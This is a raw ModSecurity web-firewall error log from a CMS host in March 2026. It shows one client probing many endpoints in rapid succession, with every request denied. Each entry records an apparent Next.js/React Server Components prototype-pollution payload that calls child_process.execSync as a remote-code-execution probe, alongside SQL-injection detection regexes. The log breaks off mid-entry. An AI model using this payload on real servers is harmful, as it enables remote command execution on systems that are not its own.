ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/ja"] [unique_id "aaZAcP2xhCLtpShpTOoyqgAAAMk"] [Tue Mar 03 03:59:12.504688 2026] [:error] [pid 21861:tid 21897] [client 172.94.9.249:47514] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/auth/verify"] [unique_id "aaZAcNsyBa6FPxjfniwsfAAAAEQ"] [Tue Mar 03 03:59:12.505531 2026] [:error] [pid 21979:tid 21985] [client 172.94.9.249:47536] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/ko"] [unique_id "aaZAcP2xhCLtpShpTOoyqwAAAMQ"] [Tue Mar 03 03:59:12.509937 2026] [:error] [pid 21861:tid 21911] [client 172.94.9.249:47896] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/send"] [unique_id "aaZAcNsyBa6FPxjfniwsfQAAAEs"] [Tue Mar 03 03:59:12.509936 2026] [:error] [pid 21862:tid 21910] [client 172.94.9.249:47744] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/health"] [unique_id "aaZAcPh_lrWoDSo4I3RnygAAAIc"] [Tue Mar 03 03:59:12.509943 2026] [:error] [pid 21862:tid 21904] [client 172.94.9.249:47696] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/ar"] [unique_id "aaZAcPh_lrWoDSo4I3RnywAAAIQ"] [Tue Mar 03 03:59:12.510241 2026] [:error] [pid 21862:tid 21908] [client 172.94.9.249:47778] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/checkout"] [unique_id "aaZAcPh_lrWoDSo4I3RnzAAAAIY"] [Tue Mar 03 03:59:12.511364 2026] [:error] [pid 21979:tid 21999] [client 172.94.9.249:47512] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/workspace"] [unique_id "aaZAcP2xhCLtpShpTOoyrAAAANI"] [Tue Mar 03 03:59:12.511663 2026] [:error] [pid 21862:tid 21902] [client 172.94.9.249:47562] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/email"] [unique_id "aaZAcPh_lrWoDSo4I3RnzgAAAIM"] [Tue Mar 03 03:59:12.511674 2026] [:error] [pid 21862:tid 21935] [client 172.94.9.249:47680] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/webhooks"] [unique_id "aaZAcPh_lrWoDSo4I3RnzQAAAJM"] [Tue Mar 03 03:59:12.511935 2026] [:error] [pid 21979:tid 21993] [client 172.94.9.249:47614] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/subscribe"] [unique_id "aaZAcP2xhCLtpShpTOoyrQAAAMw"] [Tue Mar 03 03:59:12.512051 2026] [:error] [pid 21979:tid 22000] [client 172.94.9.249:47644] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/contact"] [unique_id "aaZAcP2xhCLtpShpTOoyrgAAANM"] [Tue Mar 03 03:59:12.512269 2026] [:error] [pid 21861:tid 21928] [client 172.94.9.249:47662] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/status"] [unique_id "aaZAcNsyBa6FPxjfniwsfgAAAFM"] [Tue Mar 03 03:59:12.512492 2026] [:error] [pid 21860:tid 21864] [client 172.94.9.249:47734] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/notify"] [unique_id "aaZAcPU_evpVetAt05Vh3AAAAAA"] [Tue Mar 03 03:59:12.512733 2026] [:error] [pid 21861:tid 21915] [client 172.94.9.249:47808] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/tr"] [unique_id "aaZAcNsyBa6FPxjfniwsfwAAAE0"] [Tue Mar 03 03:59:12.514835 2026] [:error] [pid 21979:tid 21990] [client 172.94.9.249:47546] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/gql"] [unique_id "aaZAcP2xhCLtpShpTOoyrwAAAMk"] [Tue Mar 03 03:59:12.515373 2026] [:error] [pid 21979:tid 21998] [client 172.94.9.249:47754] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/webhook"] [unique_id "aaZAcP2xhCLtpShpTOoysAAAANE"] [Tue Mar 03 03:59:12.515507 2026] [:error] [pid 21861:tid 21917] [client 172.94.9.249:47788] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/zh"] [unique_id "aaZAcNsyBa6FPxjfniwsgAAAAE4"] [Tue Mar 03 03:59:12.515799 2026] [:error] [pid 21862:tid 21912] [client 172.94.9.249:47508] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/healthcheck"] [unique_id "aaZAcPh_lrWoDSo4I3RnzwAAAIg"] [Tue Mar 03 03:59:12.517099 2026] [:error] [pid 21979:tid 22003] [client 172.94.9.249:47590] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 